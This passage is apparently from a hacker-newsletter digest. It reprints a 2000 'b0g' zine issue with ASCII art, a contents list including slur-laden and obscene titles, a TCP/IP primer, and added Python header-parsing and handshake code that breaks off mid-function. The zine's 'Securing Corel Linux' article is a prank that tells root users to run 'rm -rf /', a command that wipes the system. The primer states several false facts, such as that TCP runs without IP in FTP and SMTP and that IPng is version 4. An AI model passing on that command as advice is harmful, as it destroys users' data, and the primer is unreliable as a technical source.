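                    # 200 means the CGI answered; worth triaging first
                    "status": int(m["status"]),
                })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

      A hit with status 200 means the CGI answered the request, so that host
      should be checked first and the CGI removed as the script's solution
      text says.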
      
      @HWA       

161.0 New magazine sampler: b0g #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source:http://packetstorm.securify.com/mag/b0g/b0g-2.txt
      
      
      
      This is the February 2000 Issue.
      
            
      Official b0g site: http://www.b0g.org
      (Ed's note: site was down at time of writing, looks like someone
      didn't pay their bills...)
      
      Contact: irc in #k-rad on undernet
      By email: b0g@b0g.org
      Contributions can be sent to contribute@b0g.org

      
      * Formatting is AS-IS from the download site, unmodified.
      
      ---------------------------------------------------------------------
      
      
                           _________________________________________
          .-. _ .-.       /                                         \
          | _____ | . o O| you make everyone else seem less perfect.|
         (   @ @   )      \________________________________________ /
          \       /
           \ --- /
             | |
          ---   ---
        |  i     i  |
      
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      b0g!#@!b0g!# b0g w0rld d0minati0n! - br0therh00d 0f gimps g!#@!b0g!#@!
      b0g!#@!b0 the b0g newsletter! issue 2! February 2000! ph33r! @!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      b0g  @!b0g!#000   #@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@   g!#@!b0g!#@!
      b0g  @!b0g!#0      @!b0g!#@!b0g!#   0g!#@  0g! @!b0g!       #@!b   #@!
      b0g  @!b0g!#0   g   !b0g!#@!b0g!#   0g!#@  0g  @!b0g  @!b0g  @!b   #@!
      b0g  @!b0g!#   0g!   b0g!#@!b0g!#   0g!#   0g  @!b0 !#@!b0g! @!b   #@!
      b0g  @    !#   0g!   b0g       !#   0g           b g!#   0 !# !b   #@!
      b0g        #   0g!   b0        !#   0g           b g!# !b  !# !b   #@!
      b0g   !b   #   0g!   b0   @!   !#   0g!#  b0  #@!b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#   0g!#  b0  #@!b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#   0g!# !b0  #@!b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#   0           !b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#@!b0           !b g!  !b0 !# !b0g!#@!
      b0g  @!b   #   0g!   b0   @!   !#@!b0g!  !b  !#@!b g!  !b  !# !b0g!#@!
      b0g   !    #    g    b         !#   0g! @!b  !#@!b g!#        !b   #@!
      b0g        #@       !b0        !#   0g! @!b g!#@!b0 !#@!b0g!#@!b   #@!
      b0g!#@!b0g!#@!b   #@!b0g!#@!b  !#@!b0g!#@!b0g!#@!b0  #@!b0g!#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0 !#@!   !#@!b0g!#@!b0g!#@!b0g       !#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0        !#@!b0g!#@!b0g!#@!b0g!#    g!#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0       g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ :::::::::::::::::::::::: Table of contest! ::::::::::::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 1 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Securing Corel Linux - Prae - prae@talk21.com ::::::::: ]
      [ b0g article # 2 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::: Guide to TCP/IP - redpriest - priest@hack3r.com ::::::::: ]
      [ b0g article # 3 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: Sex0r guide - k-rad-bob - 808@c2i.net ::::::::::::: ]
      [ b0g article # 4 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Shell fun - some g1mp - abuse@microsoft.com ::::::::::: ]
      [ b0g article # 5 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: TCL Guide - Prae - prae@talk21.com ::::::::::::::: ]
      [ b0g article # 6 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Obscene log - #gaydogsex - irc.undernet.org :::::::::: ]
      [ b0g article # 7 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: grannanizing - Prae - prae@talk21.com ::::::::::::: ]
      [ b0g article # 8 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Satanism  - Vegtam  - vegtam@fjell.online.no ::::::::: ]
      [ b0g article # 9 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: Negr/OS - dialect - dialect@home.com ::::::::::::: ]
      [ b0g article # 10 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: irc quotes - misc - irc.undernet.org ::::::::::::: ]
      [ b0g article # 11 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::: notes from the editor - k-rad-bob - 808@c2i.net :::::::: ]
      
      
      
      
      
      
      
      This month's issue is sponsored by Kurder King! [ eat a turkey! ]
          [ if you can't see the image properly, squint your eyes!@$ ]
      
                        ___    __waaaaxx|x_w___,    _                       
                  .._?^-_auZ*"^^Ou         =]  =       "'_=                 
                _/`x_xd&?`l       .ll_________ l          ."_,x             
             __`|jdU7^      l_uOO3O3O33OO4UGa_UO"34s_l      =|"\,x          
           _^`_dO?~     l_||u4O3333333O333333OOO|l |33ns.x     =0",u        
         _+ |dU?`     _j-|OOO333O3O3O333O3O3O333?l_jO3O33:       =3J_       
       -pu|d4Y      _3+l4O3333O3333O33O3333O3O%3?"~         __ __   l\l     
      _-_X4X^     lx?l|O333O3333O3333]"?"-l      __auO44 OOO2%34Oi   -x+    
      lxX4<      03Ol|43O3O33O%?~-     __aZ4n_,  44O2    3OO  0OOi      M   
      jOOM       xO3|4O2"~ll.   __ __  |4O3??4O. 4XO3aud 34OndOX         4< 
      OO<       -?"-l=   __  OOO2%34Oi |dOG  44i 4XOX    OOO73OOOs.       J=
      O]           _aa  j3OX 3OO  0OOi |dO3 ldO< 4dOnaaa 3OO; "*33P-      .4
      X|      ljO  %OO  |dO3 34OndOX   |dO3aXOO< 4XOO42% mX3               0
      } _a3  _jOO  %OO  j3O3 OOO73OOOs."33OO]?'         __u4OOOOOOOOC;      
      l 4OO _UOO  -%OO  |dO2 3OO; "*33P- -~- - __ud2  _wZO4OOOX3333O]+      
      : OOOO4OOn.  %OOs.jOO  mX3`     a_a_l   |jOOO3  dOOOO2                
      l OOO%?OOOOn  4OOO42P     aju=  OOOOOX=- =|4OO :%OOOOO  |uu3OOO2;     
      l OOO] ""4OO    -0___u uOO3Oc  OOOOOOOG=3xOOOC OOOOO%  MXOXOOO3;      
      : OOON   ""-    qd4O4s 4OOOOc  OOOOOOOOOgd3OOC OOOOOOi   0|OOO3;      
      i M^l   __a%<  w4OOOm~ 4OOOOc  OOOO33OOO3OOOOC "OOOOOOXuuO4OOOr!      
      i      O4OO3; jOOOO7^  4OOOOc  OOOO] *3OOOOOOC  ""X3OOOOOOO37~        
      X      OOOO3=dOOOOE    4OOOOc  OOOO]   *OOOOOC      "~~~~ll    >*s.qi]
      Ow|    OOOOOOOOOOi.    4OOOOc  OOOO]   - M333`                3:>VxHEl
      O4;.   OOOOOOOOOOOG;O. 4O3OOc  OOO2-     .-- _a]%O333~?O3:  jq_,=    0
      O44_=  OOOO3;"XOOOOOZ; OOOO3-       =l_j|dOO3O33333vWlx]` |_ZO44Zo_0uw
      OOO4;. OOOO3; lMOOOOO] X^~l    __u33OOO3OO333O33OO+l_%3  _jO4O4O4O% 4:
      4ZO44z OOOO3;   l"??~    __uO3333333O333333O333Ov`_j%l  _dOO4O4O4;.J' 
      ,-34O{ OOO3+`    = __x333OOO3333O3O3333O3O3333]0jx?l|-_jUO4O4O42-_x   
         ]4cJ?-__       ]3O33O33333O3O3333O3O333O]%x3^l  |3j44O4O4O4+` ]    
        .|*\ud444Gw_      -]3O3O3O33333O3O3333OO%^~     _dO4OO4O4O7'=       
           u*M4OOO44Ga__| -     u-~~?^?""~--O|     l__d444O4O4OX7`]         
             x~M4O4O4O44Gna__ll=               __au4UU44O4O442?`            
               = "*34O4OO4OO4444guaaaaaawaauZO444OO4OOO4O4O?-               
                    0"?*OO4O4OO4O4OOOO3O4444OO4O4O4O4X3?~`                  
                         ""?*3XOO4O4OO4OO4OO44OX37?^`
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 1 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Securing Corel Linux - Prae - prae@talk21.com ::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      This detailed guide on how to secure Corel Linux is all you will ever
      need to read...
      
      Here is what we do:-
      
      First, login as root. Your prompt should look something like this:
      
      
      [root@localhost ~]$
      
      
      Then start with these simple commands
      
      
      [root@localhost ~]$ rm -rf /
      [root@localhost ~]$ reboot
      
      
      And that's all you need to know about securing Corel Linux!
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 2 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::: Guide to TCP/IP - redpriest - priest@hack3r.com ::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      Ok, TCP/IP is a software-based communications protocol used in
      networking.
      
      Although the name may appear to be a combination of just two
      protocols, the term refers not to a single entity combining two
      protocols but rather to a set of software programs that provide
      network services such as the many things you use on the Internet
      today (remote login, FTP, and e-mail).
      
      Although those are the basic services that the protocol suite
      provides, they aren't its boundaries; many other things use TCP/IP
      to communicate. TCP/IP basically provides a method of transferring
      information from one computer to another.
      
      TCP/IP has protocols to handle error correction, manage the routing
      and delivery of data, and control the actual transmission, and many
      other things you will find out later in this lecture.
      
      Despite the fact that TCP/IP is an open protocol, many companies
      around the world have modified it for their own networking systems.
      You should be careful in choosing to modify it because it needs to
      be compatible with hardware and software and can cause problems.
      
      TCP/IP is very often referred to as an Internet architecture because
      TCP/IP and the Internet are closely woven.
      
      The Internet was originally proposed by the precursor of DARPA,
      called the Advanced Research Projects Agency (ARPA), as a method of
      testing the viability of packet-switching networks. During its
      tenure with the project, ARPA foresaw a network of leased lines
      connected by switching nodes. The network was to be named ARPANET,
      and the switching nodes were named Internet message processors
      (IMPs).
      
      After that they developed a "remote login" protocol/feature; it was
      called the Network Control Program (NCP). Later on electronic mail
      was added through the File Transfer Protocol (FTP).
      
      After this many events occurred, but there isn't the bandwidth to
      tell them here and they have almost no importance here..
      
      As ARPANET grew out of being a military-only network to take in
      other companies, universities, corporations and user communities, it
      became known as the "Internet".
      
      Note: There is no single network called the Internet. The term
      refers to a collective network of subnetworks. The only thing they
      have in common is TCP/IP.
      
      Another thing that was developed later was the Domain Name System,
      but we won't get into that much. i decided i would mention the
      . suffixes and what they are. Well, we know most of these but i will
      go over them:
      
      .com, Would be owned by a commercial company
      
      .net, Was meant for networks used by Internet service providers 
      
      .arpa, Was and is an ARPANET Internet identification addy
      
      .gov, Any government body
      
      .mil, Any military organization
      
      .edu, Educational institution
      
      .org, Anything that doesn't fall into one of these categories.
      
      Although the suffixes were categorized into those topics, today you
      can basically register any one of them for a price.
      
      Ok, here i will explain the second part of TCP/IP, IP, and what it's
      all about.
      
      TCP/IP uses a 32-bit address to identify a machine on a network to
      which it is attached. IP addresses identify a machine's connection
      to a network, not the machine itself. An IP address is an address
      that users commonly see on their machine/terminal; an example would
      be 120.43.2.45, which uniquely identifies that device.
      
      There are four formats for the IP address, with each used depending
      on the size of the network. The four formats have been named the
      class of the IP, A through D.
      
      The class can be determined by the first three (high order) bits. In
      fact the first two are usually enough because there aren't many
      class D networks. Ok, i will explain each class.
      
      Class A addys are for networks that have many machines on them. The
      24 bits for the local address are needed in these cases. The network
      is usually kept in 7 bits, which limits the number of networks that
      can be identified.
      
      Class B addresses are usually for intermediate networks, with 16-bit
      local or host addresses and 14-bit network addresses.
      
      Class C networks have only 8 bits for the local or host address,
      limiting the number of devices to 256. There are 21 bits for the
      network addresses.
      
      Class D addresses are used for multicasting purposes, when a general
      broadcast to more than one device is required. The lengths of the IP
      address are chosen carefully to provide maximum flexibility in
      assigning both network and local addresses.
      
      IP addresses are four sets of 8 bits, for a total of 32 bits. You
      often represent these bits by separation with a period, so the
      format can be thought of as network.local.local.local, but for
      Class A network.network.network.local.
      
      This is where ARP slips in (Address Resolution Protocol). ARP's job
      is to translate IP addresses to physical addresses (Network & Local).
      
      Next i will explain the Internet Protocol datagram header. When
      Ethernet receives an IP-assembled datagram (which includes the IP
      header), it adds a header to the front to create a frame; this
      process is called encapsulation.
      
      One common difference between the IP and Ethernet headers is that
      Ethernet's headers contain the physical address of the destination
      machine, whereas the IP header contains the IP address.
      
      This translation is performed by ARP.
      
      Note: Encapsulation is the process of adding something to the start
      and sometimes the end of data.
      
      Ok, next i will cover the IP header layout. This is a long ass part
      but that will be basically it for IP; next we will move on to TCP.
      
      They will be listed in order. First comes:
      
      Version number, this is a 4-bit field that contains the IP version
      number of the protocol the software is using. This is needed so that
      the receiving IP software knows how to decode the rest of the
      header, which changes with each new release of the IP standards. The
      most widely used version i have noticed is IPv4.
      
      Although several systems are testing a version called IPng (v.4), the
      Internet and most LANs do not support IP6 right now.
      
      Part of the protocol definition stipulates that the receiving
      software needs to check the version number of incoming datagrams
      before proceeding to analyze the rest of the header. If it cannot
      handle the version, the machine ignores the content completely.
      
      Header Length, this 4-bit field reflects the total length of the IP
      header built by the sending machine. It is specified in 32-bit
      words. The shortest header is 5 words, but use of the options thing
      can increase it to its maximum 6 words. To properly decode the
      header, IP MUST know when the header ends and the data begins. There
      isn't a start-of-data marker, so that's why this field is included,
      so the header length is used to offset from the start of the IP
      header to give off IP header.
      
      Types of service, the 8-bit (1 byte) Service field instructs how to
      process the datagram properly. The field's 8 bits are read and
      assigned. The first 3 bits indicate the datagram's precedence, with
      a value from 0 (normal) to 7 (network control). The higher the
      number, the more important the datagram and in theory the faster it
      is routed.
      
      The next three bits are one-bit flags that control the delay,
      throughput, and reliability of the datagram. If the bit is set to
      the number 0, the setting is normal. A bit set to 1 implies low
      delay, high throughput and high reliability for the respective
      flags. The last two bits of the field aren't used.
      
      Datagram Length or packet length, this one just basically gives the
      total length of the datagram including the header, in bytes.
      
      Next is Identification. This field holds a number that is a unique
      identifier created by the sending node. This is required in
      reassembling fragmented messages, ensuring that the fragments of one
      message aren't intermixed with another.
      
      Next we cover Flags. The flags are a 3-bit field; the first bit is
      unused and the remaining bits are called DF, which stands for Don't
      Fragment!, and MF, More Fragments, which control handling of the
      datagrams when fragmentation is requested.
      
      If the DF flag is set to 1 the datagram can't ever be fragmented; if
      it would have to be, the packet will be returned as an error.
      
      If the MF flag is set to 1, though, the current datagram is followed
      by more packets, which are reassembled to create the full message.
      
      Next i will skip to TTL (Time to live). i won't get in depth about
      this one because there isn't much depth to reach. This basically
      tells the computer the time that the datagram can remain on the
      network before the datagram is discarded.
      
      Header Checksum, the number in this field of the IP header is a
      checksum for the protocol header field, but not the data fields, to
      enable faster processing of data fields.
      
      The almost last is the Sending address and Destination address.
      These fields contain the 32-bit IP addys of the sending and
      destination devices. This is established while the datagram is
      created and not changed during routing.
      
      
      Next we cover the > EVIL < option field, heh. The option field is of
      course optional. It is composed of several codes of variable length.
      If more than one option is used in this datagram, the options appear
      consecutively in the IP header. All the options are controlled by a
      byte.
      
      This is usually divided into three fields: a 1-bit copy flag, a
      2-bit option class and a 5-bit option number... Damn im up on the
      typo's
      
      Padding isn't a hard one and has a pretty simple job. The content of
      it depends on the options selected; the padding is usually there to
      ensure that the datagram header is a round number of bytes.
      
      
      In this lecture i will not cover IPv6 because it is a hell of a
      topic, and i won't cover ICMP packets for reasons that any advanced
      user will know (TOO goddamn big :p). I might choose to do a separate
      lecture, you never know.
      
      
      Ok, next we will look @ the wonderful world of TCP and UDP, but
      first we take a break for a few minutes; as you can imagine im very
      tired.
      
      Ok, back from our break. If you didn't remember, we are covering TCP
      and UDP; first i will cover a lot of TCP, then UDP will follow.
      
      Ok, we just covered IP in considerable detail; i hope TCP will be
      also this way. As you might remember, the Internet Protocol handles
      the lower-layer functionality. Right now we look at the transport
      layer where the TCP and UDP protocols come into play.
      
      TCP/IP has a lot of inner protocols; here i will display their names
      and their function, then move on to TCP etc..
      
      
      (UDP) User Datagram Protocol: Connectionless services
      
      
      The following are routing protocols in the TCP/IP protocol family:
      
      (IP) Internet Protocol: Handles transmission of information.
      
      
      (ICMP) Internet Message Control Protocol: A maintenance protocol used 
      between two systems to share status and error information
      
      (RIP) Routing Information Protocol: determines routing
      
      (OSPF) Open shortest path first: Alternate protocol for determining 
      routing
      
      The following are Network Address protocols of the TCP/IP suite, 
      remember all of these services will be explained later on in the 
      lecture.
      
      (ARP) Address Resolution Protocol: A protocol used to determine the 
      hardware address from the ip address of the destination computer
      
      (DNS) Domain Name System: Translates host names into ip one example is 
      www.hackphreak.org after a DNS request would be 206.186.182.10
      
      (RARP) Reverse Address Resolution Protocol: Required when a computer 
      must determine an ip address when it already has a physical hardware 
      address.
      
      The following is a group of user services of the TCP/IP suite.
      
      (FTP) File transfer protocol: transfers files
      
      (BOOTP) Boot protocol: Starts up a network machine
      
      (telnet): Allows remote login
      
      
      The following are the gateway protocols they will also along with all 
      others be explained at the end of the lecture
      
      (EGP) Exterior Gateway Protocol: transfers routing information for 
      external networks 
      
      (GGP) Gateway-to-Gateway Protocol transfers routing information 
      between gateways 
      
      (IGP) Interior Gateway Protocol: transfers routing information for 
      internal networks
      
      The following are the LAST types of protocols. i call them the OTHER
      group because they really can't be placed in the other groups.
      
      (NFS) Network File System: enables directories on one machine to be 
      mounted on another.
      
      (NIS) Network Information Service: Maintains user accounts across 
      networks.
      
      
      (RPC) Remote Procedure Call: enables remote applications to 
      communicate.
      
      (SMTP) Simple Mail Transfer Protocol: transfers electronic mail
      
      (SNMP) Simple Network Management Protocol: Sends status message about 
      the network
      
      Ok so we got all the protocols and what they do for your reference.
      
      TCP is one of the most widely used transport layer protocols,
      expanding from its original implementation on the ARPANET to
      connecting commercial sites all over the world.
      
      In theory TCP could be a very simple software routine, but i
      wouldn't advise calling TCP simple. Why use a transport layer as
      complex as TCP? The most important reasons depend on IP's
      unreliability. As you have seen, IP doesn't guarantee delivery of a
      datagram packet; it's a connectionless system with no reliability.
      IP simply handles the routing of datagrams, and if a problem occurs
      during transfer IP just discards the packet, generating an ICMP
      error message back to the sender. Most people think of TCP and IP as
      a close pair, but in some instances TCP uses itself without the IP
      protocol, like in FTP and SMTP, both of which don't use IP.
      
      What is TCP? TCP provides a considerable amount of services to the
      IP layer and the upper layer. Most importantly it provides a
      connection-oriented protocol to the upper layers that can assure the
      application that the packet sent out on the network was received
      entirely.
      
      So you could say TCP acts as a message validation protocol providing
      reliable communications; if a datagram is corrupt or lost, TCP
      provides retransmitting.
      
      Note: TCP is not a piece of software. It's a communications protocol.
      
      You could actually think of TCP as being similar to a telephone
      conversation. A connection is made between the source and the
      destination; this is sometimes called a virtual circuit. But files
      and data can be transferred during the conversation like a two-way
      phone conversation, and when they are done one or both computers
      agree to drop the conversation.
      
      Because TCP is a connection-oriented protocol responsible for
      ensuring the transfer of a datagram from the source to the
      destination machine (end-to-end communications), TCP MUST receive
      communications messages from the destination machine to acknowledge
      receipt of the datagram.
      
      The is a stream of individual characters sent asynchronously. This
      is in contrast to most protocols, which use fixed blocks of data.
      This can pose some conversation problems with applications that
      handle only formally constructed blocks of data or insist on
      fixed-size messages.
      
      To better illustrate the role of TCP we will "follow" a message to
      get the anatomy of the message..
      
      The message originates from an application in an upper layer and is
      then passed to TCP from the next higher layer in the architecture
      through some protocol. The message is passed as a stream.
      
      TCP receives this stream of bytes and assembles them into TCP
      segments, or packets. In the process of assembling the segment,
      header information is attached to the front of the data. Each
      segment has a checksum calculated then embedded within the header,
      as well as a sequence number if there is more than one segment in
      the entire message. The length of the segment is usually determined
      by TCP or a system value determined by the system administrator.
      
      If two-way communications are required, like FTP or Telnet, a
      connection (virtual circuit) between the sending and receiving
      machines is established prior to passing the segment to IP for
      routing. This process starts with the sending TCP software issuing a
      request for a TCP connection with the receiving machine. In the
      message is a unique number (called a socket #) that identifies the
      sending machine's connection. The receiving TCP software assigns its
      own unique number and sends it back to the sending machine.
      
      The two unique numbers then define the connection between the two
      machines until the virtual circuit is terminated. After the virtual
      circuit is established, TCP sends the segment to the IP software,
      which issues the message over the network as a datagram. IP can
      perform any of the changes to the segment that you saw earlier, such
      as fragmenting it and reassembling it at the destination machine.
      These steps are completely transparent to the TCP layers, however.
      After winding its way over the network, the receiving machine's IP
      passes the received segment to the recipient machine's TCP layer,
      where it is processed and passed up to the applications using an
      upper-layer protocol.
      
      If the message was more than one segment long (not IP datagrams),
      the receiving TCP software reassembles the message using the
      sequence numbers contained in each segment header. If a segment is
      missing or corrupt, TCP returns a message with the faulty sequence
      number in the body; the originating TCP software can then resend the
      bad segment (Cool eh?)
      
      The receiving machine's TCP implementation can perform a simple flow
      control to prevent buffer overload. It does this by sending a buffer
      size called a window value to the sending machine, following which
      the sender can send only enough bytes to fill the window. After that
      the sender must wait for another value to be received. This provides
      a handshaking protocol between the two machines, although it slows
      down the transmission time slightly and increases network traffic.
      
      I won't get into TCP timers too much. Here goes some stuff on TCB
      and flow Overflow (Overflow)
      
      TCP has a lot to keep track of: information about each connection.
      It does this through a transmission control block, which contains
      information about the local and remote socket numbers, the send and
      receive buffers, security and priority values, and the current
      segment queue. The TCB
      
      As mentioned earlier TCP must communicate with IP in the layer below 
      and applications in the upper layer. TCP must also communicate with 
      other TCP implementations across networks. To do this, it uses 
      Protocol Data Units (PDUs), which are called segments in TCP parlance
      
      The following is a layout of one of those units
      
      The different fields are as follows
      
      * Source port: A 16-bit field that identifies the local TCP user 
      (usually an upper-layer application program).
      
      * Destination port: A 16-bit field that identifies the remote 
      machine's TCP user.
      
      * Sequence number: A number indicating the current block's position in 
      the overall message. This number is also used between two TCP 
      implementations to provide the initial send sequence (ISS) number.
      
      * Acknowledgment number: A number that indicates the next sequence 
      number expected. In a backhanded manner, this also shows the sequence 
      number of the last data received; it shows the last sequence number 
      received plus 1.
      
      * Data offset: The number of 32-bit words that are in the TCP header. 
      This field is used to identify the start of the data field.
      
      * Reserved: A 6-bit field reserved for future use. The six bits must 
      be set to 0.
      
      * Urg flag: If on (a value of 1), indicates that the urgent pointer 
      field is significant.
      
      * Ack flag: If on, indicates that the Acknowledgment field is 
      significant.
      
      * Psh flag: If on, indicates that the push function is to be 
      performed.
      
      * Rst flag: If on, indicates that the connection is to be reset.
      
      
      * Syn flag: If on, indicates that the sequence numbers are to be 
      synchronized. This flag is used when a connection is being 
      established.
      
      * Fin flag: If on, indicates that the sender has no more data to send. 
      This is the equivalent of an end-of-transmission marker.
      
      * Window: A number indicating how many blocks of data the receiving 
      machine can accept.
      
      * Checksum: Calculated by taking the 16-bit one's complement of the 
      one's complement sum of the 16-bit words in the header (including 
      pseudo-header) and text together. (A rather lengthy process required 
      to fit the checksum properly into the header.)
      
      
      * Urgent pointer: Used if the urg flag was set; it indicates the 
      portion of the data message that is urgent by specifying the offset 
      from the sequence number in the header. No specific action is taken by 
      TCP with respect to urgent data; the action is determined by the 
      application.
      
      * Options: Similar to the IP header option field, this is used for 
      specifying TCP options. Each option consists of an option number (one 
      byte), the number of bytes in the option, and the option values. Only 
      three options are currently defined for TCP:
      
      
      * Padding: Filled to ensure that the header is a 32-bit multiple.
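
      The field list above, turned into a parser. This is an added example, 
      not code from the original article. The sample segment is constructed, 
      and option kinds 0 (end of list), 1 (no-operation) and 2 (maximum 
      segment size) follow RFC 793, which the article does not list.

```python
import struct

# The six flag bits in the order the list above gives them (URG is the highest).
FLAG_BITS = [("URG", 0x20), ("ACK", 0x10), ("PSH", 0x08),
             ("RST", 0x04), ("SYN", 0x02), ("FIN", 0x01)]


class HeaderError(ValueError):
    """Raised when a segment is too short or its header fields are inconsistent."""


def parse_options(raw):
    """Walk the options area: option number (1 byte), length (1 byte), value."""
    opts, i = [], 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:              # end of option list; whatever follows is padding
            break
        if kind == 1:              # no-operation: a single byte with no length
            i += 1
            continue
        if i + 1 >= len(raw):
            raise HeaderError("option %d has no length byte" % kind)
        length = raw[i + 1]        # counts the kind and length bytes too
        if length < 2 or i + length > len(raw):
            raise HeaderError("option %d has bad length %d" % (kind, length))
        opts.append((kind, raw[i + 2:i + length]))
        i += length
    return opts


def parse_tcp_header(segment):
    """Split a raw TCP segment into the fields described in the list above."""
    if len(segment) < 20:
        raise HeaderError("shorter than the 20-byte fixed header")
    (sport, dport, seq, ack, off_flags,
     window, checksum, urgent) = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = off_flags >> 12          # header length in 32-bit words
    reserved = (off_flags >> 6) & 0x3F     # the six bits that must be 0
    header_len = data_offset * 4
    if data_offset < 5 or header_len > len(segment):
        raise HeaderError("data offset %d does not fit the segment" % data_offset)
    flags = [name for name, bit in FLAG_BITS if off_flags & bit]
    return {
        "source_port": sport, "dest_port": dport,
        "sequence": seq, "acknowledgment": ack,
        "data_offset": data_offset, "reserved": reserved,
        "flags": flags, "window": window,
        "checksum": checksum,              # returned as-is, not verified here
        "urgent_pointer": urgent if "URG" in flags else None,
        "options": parse_options(segment[20:header_len]),
        "data": segment[header_len:],
    }


def build_sample_syn():
    """Constructed sample: SYN, sequence 50, one MSS option (kind 2, value 1460)."""
    fixed = struct.pack("!HHIIHHHH", 1025, 23, 50, 0, (6 << 12) | 0x02, 4096, 0, 0)
    return fixed + bytes([2, 4, 0x05, 0xB4])


if __name__ == "__main__":
    for field, value in parse_tcp_header(build_sample_syn()).items():
        print("%-15s %r" % (field, value))
```

      The data offset is checked against the bytes actually received before 
      the options are sliced out, so a header that claims to be longer than 
      the segment is rejected instead of being read past its end.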
      
      Next I will cover how TCP establishes a connection, in the EXACT 
      process; this will help you understand TCP, I think.
      
      A connection can be established between two machines only if a 
      connection between the two sockets does not exist, both machines agree 
      to the connection (like a handshake eh) and both machines have the 
      resources available. If any of those conditions isn't met, the 
      connection can't be made.
      
      The acceptance of connections can be triggered by an application or a 
      system administration routine. Once a connection is established, it is 
      given certain properties that are valid until the connection is closed. 
      Typically, these are a precedence value and a security value. These 
      settings are agreed upon by the two applications when the connection 
      is in the process of being established.
      
      (Sends a global notice for hackphreak users to wake up :p)
      
      In most cases, a connection is expected by two applications, so they 
      issue active or passive open requests. (Ok, let's get to how it's 
      really done.) The process begins with Machine A's TCP receiving a 
      request for a connection from its ULP, to which it sends an active 
      open primitive to Machine B. The segment that is constructed has the 
      SYN flag set on (set to 1) and has a sequence number assigned.
      
      The application on Machine B has issued a passive open instruction to 
      its TCP. When the SYN SEQ 50 segment is received, Machine B's TCP 
      sends an acknowledgment back to Machine A with the sequence number of 
      51. Machine B also sets an ISS (Initial Send Sequence number) of its 
      own. This shows the message as "ACK 51; SYN 200," indicating that the 
      message is an acknowledgment with sequence number 51, it has the SYN 
      flag set, and it has an ISS of 200.
      
      Upon receipt, Machine A sends back its own acknowledgment message with 
      the sequence number set to 201. This is "ACK 201". Then, having opened 
      and acknowledged the connection, Machine A and Machine B both send 
      connection open messages through the ULP to the requesting 
      applications.
      
      It is not necessary for the remote machine to have a passive open 
      instruction, as mentioned earlier. In this case the sending machine 
      provides both the sending and receiving socket numbers, as well as 
      precedence, security, and timeout values. It is common for two 
      applications to request an active open at the same time. This is 
      resolved quite easily, although it does involve a little more network 
      traffic.
      
      I will describe data transfer and how it occurs but not closing 
      connections etc.. because that's long stuff :p
      
      Transferring information is straightforward. For each block of data 
      received by Machine A's TCP from the ULP, TCP encapsulates it and 
      sends it to Machine B with an increasing sequence number. After 
      Machine B receives the message, it acknowledges it with a segment 
      acknowledgment that increments the next sequence number (and hence 
      indicates that it has received everything up to that sequence).
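
      The SYN 50 / ACK 51; SYN 200 / ACK 201 exchange and the data 
      acknowledgment described above, as a small two-endpoint model. This is 
      an added example, not code from the original article. The Endpoint and 
      Segment names are made up for the illustration, and sequence numbers 
      count bytes as in real TCP.

```python
from collections import namedtuple

# flags is a set of flag names; ack is None when the ACK flag is not set.
Segment = namedtuple("Segment", "flags seq ack data", defaults=(b"",))


class Endpoint:
    """One side of a connection, tracking only what the handshake needs."""

    def __init__(self, name, iss):
        self.name, self.iss = name, iss
        self.state = "CLOSED"
        self.snd_nxt = iss       # next sequence number this side will send
        self.rcv_nxt = None      # next sequence number expected from the peer
        self.received = b""

    def passive_open(self):
        self.state = "LISTEN"

    def active_open(self):
        self.state = "SYN_SENT"
        self.snd_nxt = self.iss + 1              # the SYN uses up one number
        return Segment({"SYN"}, self.iss, None)

    def send(self, payload):
        seg = Segment({"ACK"}, self.snd_nxt, self.rcv_nxt, payload)
        self.snd_nxt += len(payload)
        return seg

    def receive(self, seg):
        if self.state == "LISTEN" and seg.flags == {"SYN"}:
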